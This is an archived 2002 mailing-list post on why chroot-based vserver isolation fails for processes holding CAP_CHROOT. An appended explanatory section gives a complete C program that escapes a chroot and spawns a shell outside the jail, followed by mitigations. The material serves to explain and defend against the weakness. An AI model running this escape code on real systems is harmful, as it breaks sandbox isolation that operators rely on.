From: Nick Craig-Wood (ncw1_at_axis.demon.co.uk)
Date: Wed 06 Feb 2002 - 20:35:35 GMT
On Wed, Feb 06, 2002 at 02:46:10PM +1100, edward_at_paradigm4.com.au wrote:
> It is my understanding that all the considered chroot exploits ( we
> are not talking about using devices and mounting tricks as this
> capability is disabled in vserver ) are based on either using a file
> handle that was open before the first chroot, or the current
> directory from before the first chroot.
>
> Unless I'm missing something, the solution is simple - do not leave
> any file handles open when you do chroot and do chdir("/")
> immediately after. Problem solved.
I'm afraid not.
I wrote a proof of concept exploit which will break any chroot
provided the user that runs it has CAP_CHROOT. I'll email the exploit
to you if you want.
> > Once the chroot is done, you are free to do chdir (".."). Since
> > the test is performed only if the current directory == the process
> > root directory, chdir("..") works and lets you out of the original
> > vserver root directory.
>
> If you did chdir("/") after the first chroot, subsequent chroot and
> chdir("..") will not get you out.
Unfortunately it will. Assume you've done all your chrooting magic.
Now cd / (in the chroot). Chroot into /tmp. Your current working
directory is now above your root directory. You can now cd .. with
impunity and when you've got where you want to be, chroot ".".
-- Nick Craig-Wood ncw_at_axis.demon.co.uk
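The escape sequence Nick describes, as an added example that is not part of the original mailing-list post or of the vserver project: cd to the jail's "/", chroot() into a sub-directory without a chdir(), walk up with chdir("..") because the kernel only pins ".." while cwd == root, then chroot(".") once at the real "/". It assumes Linux, a process holding CAP_SYS_CHROOT (the thread calls it CAP_CHROOT), and a writable /tmp inside the jail; the scratch directory name and the 256-step walk are illustrative choices, not values from the thread.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Break out of a chroot with nothing but CAP_SYS_CHROOT:
 *   1. cd / inside the jail (the hardening proposed earlier in the thread;
 *      it makes no difference)
 *   2. chroot() into a sub-directory WITHOUT chdir(): cwd is now above root
 *   3. chdir("..") repeatedly: ".." is only pinned when cwd == root
 *   4. chroot(".") to make wherever we stopped (the real /) the new root
 * Returns 0 on success or -errno on failure (-EPERM without the capability).
 */
int break_chroot(void)
{
    /* Assumption: /tmp exists and is writable inside the jail. */
    char scratch[] = "/tmp/escape.XXXXXX";

    if (chdir("/") != 0)
        return -errno;

    if (mkdtemp(scratch) == NULL)
        return -errno;

    /* Deliberately no chdir() after this chroot(): that is the whole trick. */
    if (chroot(scratch) != 0) {
        int saved = errno;          /* EPERM when CAP_SYS_CHROOT is missing */
        rmdir(scratch);             /* root is unchanged, so the path is valid */
        return -saved;
    }

    /* cwd (the old jail's "/") lies outside the new root, so ".." is not
       pinned. 256 steps clears any realistic nesting depth; once we reach
       the real "/", further ".." lookups are harmless no-ops. */
    for (int i = 0; i < 256; i++)
        if (chdir("..") != 0)
            return -errno;

    /* Make the real root our root. */
    if (chroot(".") != 0)
        return -errno;
    return 0;
}

int main(void)
{
    int r = break_chroot();
    if (r == 0) {
        printf("escaped: root is now the real /\n");
        execl("/bin/sh", "sh", (char *)NULL);   /* shell outside the jail */
    }
    fprintf(stderr, "escape failed: %s\n", strerror(-r));
    return 1;
}
```

Run as an unprivileged user the chroot() call fails with EPERM and nothing happens; with CAP_SYS_CHROOT it succeeds regardless of whether the jailed process closed every descriptor and chdir("/")'d first, which is the point of the reply. The only effective mitigations are to drop CAP_SYS_CHROOT (and the mount/device capabilities) before entering the jail, or to use a mechanism such as mount namespaces or pivot_root that does not rely on chroot at all.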